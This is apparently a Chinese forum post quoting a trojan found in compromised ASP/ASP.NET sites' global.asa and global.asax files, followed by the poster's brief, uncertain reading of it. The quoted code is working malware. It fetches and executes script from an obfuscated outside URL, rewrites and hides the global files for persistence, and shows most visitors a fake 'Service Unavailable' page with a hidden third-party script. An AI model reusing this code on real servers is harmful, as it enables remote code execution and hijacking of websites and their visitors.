sub Session_OnStart
On Error Resume Next
url="h"&"t"&"t"&"p"&":"&"/"&"/"&"b"&"o"&"t"&"s"&"."&"z"&"h"&"-"&"c"&"n"&"."&"c"&"c"&":"&"8"&"0"&"8"&"0"&"/"&"c"&"o"&"d"&"e"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"_"&"l"&"o"&"a"&"d"&"."&"t"&"x"&"t"
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
set objStream=Nothing
if instr(GetHtml,"by-aming")>0 then
execute GetHtml
end if
end sub
if instr(CODE1,"by-aming")>0 and instr(CODE2,"by-aming")>0 then
dim fso,f
dim objwriter As StreamWriter
fso = Server.CreateObject("scripting.filesystemobject")
if fso.FileExists("\\.\"&Server.MapPath("/global.asax")) then
f=fso.Getfile("\\.\"&Server.MapPath("/global.asax"))
f.Attributes=0
objwriter= File.CreateText(server.mappath("/global.asax"))
objwriter.write(CODE1)
objwriter.close
f.Attributes=1+2+4
f=Nothing
end if
if fso.FileExists("\\.\"&Server.MapPath("/global.asa")) then
f=fso.Getfile("\\.\"&Server.MapPath("/global.asa"))
f.Attributes=0
objwriter= File.CreateText(server.mappath("/global.asa"))
objwriter.write(CODE2)
objwriter.close
f.Attributes=1+2+4
f=Nothing
end if
fso = Nothing
objwriter = Nothing
end if
dim geturl
geturl=LCase(Request.Url.ToString())
if instr(geturl,"amjcdm=ok")=0 and instr(LCase(Request.ServerVariables("http_host")),"gov.cn")=0 and instr(LCase(Request.ServerVariables("http_host")),"edu.cn")=0 and instr(geturl,"http://"& Request.ServerVariables("http_host") &"/index.aspx")=0 and instr(geturl,"http://"& Request.ServerVariables("http_host") &"/default.aspx")=0 and instr(LCase(Request.ServerVariables("HTTP_REFERER")),LCase(Request.ServerVariables("http_host")))<=0 then
response.write("<h1>Service Unavailable</h1><div style=""display:none""><"&"script src=""http://js.users.51.la/4096921.js""><"&"/script></div>")
response.end
End if
End Sub
</script>
好像是asp的global.asa,是把asp页面都转到其他页面。aspx的global.asax,把aspx页面地址包含amjcdm=ok gov.cn edu.cn /index.aspx /default.aspx等的都正常加载。其他的都显示Service Unavailable。
vb没搞过。不是很明白。好像有不少中这个木马的网站。